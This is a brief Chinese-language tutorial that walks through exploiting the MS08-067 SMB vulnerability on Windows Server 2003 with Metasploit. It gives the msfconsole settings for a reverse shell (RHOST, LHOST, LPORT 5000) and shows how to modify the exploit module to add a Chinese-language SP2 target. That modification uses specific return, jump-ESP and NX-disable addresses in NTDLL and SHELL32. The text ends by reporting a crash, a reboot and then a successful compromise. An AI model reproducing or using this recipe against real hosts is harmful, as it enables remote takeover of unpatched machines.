
use 載入漏洞
通過“show options"可以查看所需要的設置;
yes 都是可填的
使用" show targets"可以查看滲透攻擊模塊可以成功攻擊的平台;
我們這里可以看到 有 windos 2003 sp1,sp2 ,xp,2000 更具系統選擇利用的payload
即 設置”set target 34"
設置攻擊目標“set RHOST 目標ip地址”
設置回傳端口"set LPORT 5000"
設置主機ip" set LHOST 主機ip“
運行exploit就可以看到成果了 等待反彈shell 但是這里遇到一個問題我的windows server 2003系統是中文的 不是英文的所以需要對ms08_067_netapi_ser2003_zh.rb
進行修改 重新打開終端 然后切換到已下目錄:/usr/share/metasploit-framework/modules/exploits/windows/smb
在ms08_067_netapi_ser2003_zh.rb中增加以下代碼,修改是4個指針地址
['Windows 2003 SP2 Chinese (NX)',
{
'RetDec' => 0x7c99beb8, # dec ESI, ret @NTDLL.DLL (0x4EC3)
'RetPop' => 0x7cb5e84e, # push ESI, pop EBP, ret @SHELL32.DLL(0x565DC3)
'JmpESP' => 0x7c99a01b, # jmp ESP @NTDLL.DLL(0xFFE4)
'DisableNX' => 0x7c96f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
輸入
vim ms08_067_netapi_ser2003_zh.rb
:set number
輸入 /Windows 2003 SP2
這里我們幫他構建一個 652 -659行復制 輸入 10y 回車
在p 復制到你想要的地方
在退出 exit 輸入 msfconsole
從新復現上面的步驟 search targets 可以看到我們剛剛添加的中文利用版本
重復上面的步驟 發現
讓 目標重啟 應該目標機已經崩潰
嘗試重啟目標主機,執行相同操作,攻擊成功。